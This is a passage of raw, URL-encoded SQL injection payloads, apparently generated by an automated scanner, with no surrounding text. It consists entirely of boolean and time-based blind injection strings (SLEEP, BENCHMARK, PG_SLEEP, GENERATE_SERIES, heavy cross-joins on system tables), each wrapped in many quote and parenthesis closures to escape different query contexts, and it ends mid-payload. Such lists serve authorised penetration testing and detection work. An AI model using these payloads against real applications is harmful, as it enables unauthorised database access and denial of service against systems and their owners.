foo%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%282565%3D2565 foo%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%285140%3D5140 foo%29%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%283957%3D3957 foo%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%27cdCx%27%3D%27cdCx foo%27%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%27wmmF%27%3D%27wmmF foo%27%29%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%27ZqTG%27%3D%27ZqTG foo%27%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%27wHCR%27%3D%27wHCR foo%27%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%27afXY%27%20LIKE%20%27afXY foo%27%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%27btqY%27%20LIKE%20%27btqY foo%27%29%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%27FIwN%27%20LIKE%20%27FIwN foo%27%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%27NLpq%27%20LIKE%20%27NLpq foo%22%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%22LPSl%22%3D%22LPSl foo%22%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%22lnOf%22%3D%22lnOf foo%22%29%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%22Ooxs%22%3D%22Ooxs foo%22%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%22SDzV%22%3D%22SDzV foo%22%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%22xjGd%22%20LIKE%20%22xjGd foo%22%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%22obkP%22%20LIKE%20%22obkP foo%22%29%29%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%22QYta%22%20LIKE%20%22QYta foo%22%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%22bXgB%22%20LIKE%20%22bXgB foo%29%20WHERE%203068%3D3068%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20WHERE%203414%3D3414%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20WHERE%204648%3D4648%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%20WHERE%206595%3D6595%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20%7C%7C%20%28SELECT%205363%20FROM%20DUAL%20WHERE%208624%3D8624%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202852%20WHERE%208519%3D8519%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%201742%20FROM%20DUAL%20WHERE%205677%3D5677%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29 foo%20%2B%20%28SELECT%209444%20WHERE%207110%3D7110%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29 foo%27%20%2B%20%28SELECT%20%27ZpRi%27%20FROM%20DUAL%20WHERE%204947%3D4947%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27dwtl%27%20WHERE%205588%3D5588%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201230%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%23 -6223%29%20OR%205778%3DSLEEP%285%29 -3425%27%29%20OR%205778%3DSLEEP%285%29 -6709%27%20OR%205778%3DSLEEP%285%29 -4677%22%20OR%205778%3DSLEEP%285%29 -2097%29%20OR%205778%3DSLEEP%285%29%20AND%20%283428%3D3428 -6672%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%283787%3D3787 -5461%29%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%288545%3D8545 -7318%20OR%205778%3DSLEEP%285%29 -7873%27%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%27RegY%27%3D%27RegY -2504%27%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%27YDzY%27%3D%27YDzY -1917%27%29%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%28%27KiMw%27%3D%27KiMw -2328%27%20OR%205778%3DSLEEP%285%29%20AND%20%27YriG%27%3D%27YriG -9973%27%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%27Hmrl%27%20LIKE%20%27Hmrl -7058%27%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%27QkAW%27%20LIKE%20%27QkAW -5995%27%29%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%28%27FJVC%27%20LIKE%20%27FJVC -3326%27%20OR%205778%3DSLEEP%285%29%20AND%20%27bjZg%27%20LIKE%20%27bjZg -5519%22%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%22vjss%22%3D%22vjss -8007%22%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%22TetO%22%3D%22TetO -7810%22%29%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%28%22bBXR%22%3D%22bBXR -5815%22%20OR%205778%3DSLEEP%285%29%20AND%20%22UzZr%22%3D%22UzZr -8299%22%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%22frKl%22%20LIKE%20%22frKl -3036%22%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%22FYCB%22%20LIKE%20%22FYCB -8178%22%29%29%29%20OR%205778%3DSLEEP%285%29%20AND%20%28%28%28%22CAyK%22%20LIKE%20%22CAyK -1541%22%20OR%205778%3DSLEEP%285%29%20AND%20%22xoGn%22%20LIKE%20%22xoGn -5855%29%20WHERE%206389%3D6389%20OR%205778%3DSLEEP%285%29 -6158%27%29%20WHERE%208820%3D8820%20OR%205778%3DSLEEP%285%29 -9668%27%20WHERE%203415%3D3415%20OR%205778%3DSLEEP%285%29 -6579%22%20WHERE%205826%3D5826%20OR%205778%3DSLEEP%285%29 -7589%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -9048%27%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -9456%27%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -1279%22%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -3775%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%288702%3D8702 -4998%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%284005%3D4005 -8537%29%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%282457%3D2457 -8454%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -2161%27%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%27TeAm%27%3D%27TeAm -2813%27%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%27xQow%27%3D%27xQow -4393%27%29%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%28%27HJZh%27%3D%27HJZh -9934%27%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%27uJny%27%3D%27uJny -6125%27%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%27awab%27%20LIKE%20%27awab -5620%27%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%27DKCH%27%20LIKE%20%27DKCH -9747%27%29%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%28%27fOes%27%20LIKE%20%27fOes -6072%27%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%27fBSE%27%20LIKE%20%27fBSE -8851%22%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%22pfOy%22%3D%22pfOy -1675%22%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%22wOpn%22%3D%22wOpn -4293%22%29%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%28%22hPpZ%22%3D%22hPpZ -3130%22%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%22SPHJ%22%3D%22SPHJ -8897%22%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%22GphS%22%20LIKE%20%22GphS -1964%22%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%22tvme%22%20LIKE%20%22tvme -8563%22%29%29%29%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%28%28%28%22vtMR%22%20LIKE%20%22vtMR -5155%22%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29%20AND%20%22dGxR%22%20LIKE%20%22dGxR -1572%29%20WHERE%208487%3D8487%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -2310%27%29%20WHERE%202878%3D2878%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -3895%27%20WHERE%205673%3D5673%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -4740%22%20WHERE%207570%3D7570%20OR%206874%3DBENCHMARK%285000000%2CMD5%280x78526848%29%29 -4358%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -1941%27%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -9608%27%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -1817%22%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -4535%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%281935%3D1935 -3024%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%289922%3D9922 -4080%29%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%281551%3D1551 -1900%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -2192%27%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27XMBT%27%3D%27XMBT -8547%27%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27HAMw%27%3D%27HAMw -1421%27%29%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27eFom%27%3D%27eFom -6664%27%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%27gdlC%27%3D%27gdlC -4143%27%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27cQUK%27%20LIKE%20%27cQUK -5037%27%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27dUNU%27%20LIKE%20%27dUNU -8254%27%29%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27YiYu%27%20LIKE%20%27YiYu -3822%27%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%27cufd%27%20LIKE%20%27cufd -4952%22%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22NbMO%22%3D%22NbMO -9966%22%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22eVmc%22%3D%22eVmc -2450%22%29%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22mfKt%22%3D%22mfKt -5908%22%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%22wFJU%22%3D%22wFJU -6814%22%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22geUs%22%20LIKE%20%22geUs -1062%22%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22dBQI%22%20LIKE%20%22dBQI -3580%22%29%29%29%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22umUb%22%20LIKE%20%22umUb -3312%22%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29%20AND%20%22fkAD%22%20LIKE%20%22fkAD -9201%29%20WHERE%202612%3D2612%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -4590%27%29%20WHERE%201162%3D1162%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -3814%27%20WHERE%202226%3D2226%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -8595%22%20WHERE%207442%3D7442%20OR%207058%3D%28SELECT%207058%20FROM%20PG_SLEEP%285%29%29 -6885%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -6625%27%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -9674%27%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -7878%22%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -5912%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%283983%3D3983 -1016%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%281209%3D1209 -8755%29%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%288613%3D8613 -6802%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -6903%27%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27czxw%27%3D%27czxw -3174%27%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27Atfr%27%3D%27Atfr -7701%27%29%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27AfKM%27%3D%27AfKM -3427%27%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27cBYQ%27%3D%27cBYQ -4137%27%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27Gsnr%27%20LIKE%20%27Gsnr -3707%27%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27FgnH%27%20LIKE%20%27FgnH -7508%27%29%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27XDtm%27%20LIKE%20%27XDtm -8541%27%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27rZWu%27%20LIKE%20%27rZWu -4601%22%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22CXHl%22%3D%22CXHl -4294%22%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22PCNj%22%3D%22PCNj -1401%22%29%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22dhdL%22%3D%22dhdL -2017%22%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22adAn%22%3D%22adAn -3093%22%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22zasZ%22%20LIKE%20%22zasZ -4703%22%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22gper%22%20LIKE%20%22gper -3024%22%29%29%29%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22yrqI%22%20LIKE%20%22yrqI -4767%22%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22ojgd%22%20LIKE%20%22ojgd -3581%29%20WHERE%209380%3D9380%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -4969%27%29%20WHERE%208916%3D8916%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -3618%27%20WHERE%207563%3D7563%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -8746%22%20WHERE%202296%3D2296%20OR%205329%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -4145%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -6438%27%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8227%27%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8461%22%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -5213%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%287469%3D7469 -2992%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%286256%3D6256 -8594%29%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%288845%3D8845 -9750%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8868%27%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27EXpX%27%3D%27EXpX -4975%27%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27KerG%27%3D%27KerG -4378%27%29%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27Zgpv%27%3D%27Zgpv -7971%27%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27StyQ%27%3D%27StyQ -2427%27%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27IWzB%27%20LIKE%20%27IWzB -5790%27%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27ezyJ%27%20LIKE%20%27ezyJ -6573%27%29%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27cBwc%27%20LIKE%20%27cBwc -3714%27%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27poUe%27%20LIKE%20%27poUe -1295%22%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22AeCw%22%3D%22AeCw -7729%22%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22REnA%22%3D%22REnA 